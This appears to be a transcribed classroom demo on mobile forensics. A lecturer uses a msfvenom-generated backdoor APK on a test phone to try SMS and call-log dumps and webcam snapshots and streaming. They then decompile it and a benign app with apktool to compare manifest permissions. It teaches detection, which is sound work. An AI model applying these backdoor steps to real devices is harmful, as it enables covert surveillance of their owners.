Okay, no call log entry is found because I never used the phone to call. The phone has been reset only yesterday. Has not been used for calling, so there is no call log. As same as SMS, there is no SIM card on the phone, so I cannot send SMS. But we can try the dumb. Let me see. Dumb SMS. Of course, it will say nothing. Dumb SMS. Interesting. No SMS message found. Yes, correct. There is no SMS message found. Let me see if I can. Uh, I cannot send SMS because there is no SIM card installed on the phone. But we can do webcam list. Hopefully, let me see. If the Android is new, very recent, I cannot send this comment actually. Okay, it says I have two camera, back camera and front camera. So number one is back camera, number two is front camera, and then I can snap. Hopefully it works. Oh, sorry. Webcam snap two. Two is what? Front or back? Wait, sorry. Oh, I put it in the front. So I webcam snap two. The front camera go frame. Okay, it has in this one home kali this one this file. Let me see if I can see the file. Open folder. It's black. Let me see if I. Where is the front side? This one front. Oh, okay, that's back side. Uh, this one. Let me see if I can do again. It's hopefully something. Okay, all black. Okay, fail. Doesn't want to talk to the camera. Okay, fail. Can I stream then? Hopefully. Webcam stream. Okay. Open the player at. Oops. Where is it? Wrong. Oh, this one. Let me see. Nope. Let me see if I can open the player here. Copy selection. Okay. Paste. Oh, I think I have problem with my camera here. I don't know what happened. This. Oh, okay. Oh, I have to. I have to. Okay. This is my room. Okay. Let me see if I can see something. See. Oops. Not a good camera, eh? But at least it sees something, but it's not good enough. Let me see if I can. Okay. Let me see if I can do this. Uh, this is actually the mouse, my mouse. I have to hold. Oh, okay. Takes a while. So basically, it will send screenshots. It's not a real time video. Okay. The the red cable is actually my microphone cable. Can I make it more? Let me see if I can do it. Nope. Wrong. So basically, try to send something because this is. Let me see if I can do something more useful, meaningful. It's difficult, eh? Okay. Oh, okay. Show. Oh, that's the over there. That's actually a box with Kalimantan. So that's actually on the left. It's a box with Kalimantan. Oh, this one. How about this one? This way. Okay. So this is Windows. And so it can see something basically. Okay. Can see something and it's on the back camera. so we can see something there. Okay, so that's how it look like. Now we need to evaluate whether the application is good or bad. So I will stop this one. To check whether the application is good or bad, we can do it using APK tools, this one. But the version is too low, so I cannot use the APK tools to uh, to what's that? To create to infect APK file. So I need to decompile. This is how to use the APK tools. Basically, I need to decompile an APK and put the output in the output folders, and then to extract. Basically, this is the source code of the file. Having the source code, then we can see things that the application doing bad things. For example, if the application asking for permission to access SMS, sending information to certain websites, then we can see in the source code. Basically, the output folder is source code. Let me do the APK tools to the application. Okay, I will I will keep the communication running. APK tools. Okay, uh, we have to do something like this. Decompile the application. Decompile means the application is we regenerate the source code from the application. Okay, that's decompiling. Backdoor, and then this is the output folder. So it tries to decompile the APK into source code. Okay, let me see. This is the output folder. We regenerate into source code. Let me see the output folder. This is the source code of Android. You need to be able to see these things. We need to have some sort of knowledge on how to compile, how to develop an Android. For example, in this one, uh, it contain it see the what kind of permission it has. So for example, this particular application, it has permission to access the internet, access Wi-Fi states, access the network states, access course location, find location, read phone states, send SMS, receive SMS, record. Basically, it can do anything. Okay, so that's the bad side of the application. It can show direct. It will show directly what is the bad things we can do using this application. So this is very bad. Okay, because of course it's bad because we generate using MSF Phenom. Okay, now let me do the same thing. I will remove all the output folder. Okay, I will generate. This is the previous one is the backdoor APK. I will do for the president APK, which is not a bad application. President APK. Hopefully, it's a much better application. And also we have tests here. We can do the same thing for test, but I will do only the president only lah. Let me. This is 8:16, so couple of minutes more. Hopefully, we can see something. Okay. Okay. Let me see the Android manifest. See, the only permission it asks is access to the internet. Okay, that's it. No other bad permission. The rest is okay. Okay, so that's the difference between good application and bad application, basically. Okay, hopefully this can give you some idea on how to do some forensic on mobile phone. The forensic, I show the forensic for application using APK tools as well as access the phone directly using ADB. So with that, I close the meeting. Hopefully, you can have all the knowledge with you. I'm sorry, last week I was very tight, so I cannot join the class. We can see each other next week. Thank you, and see you next week. Thank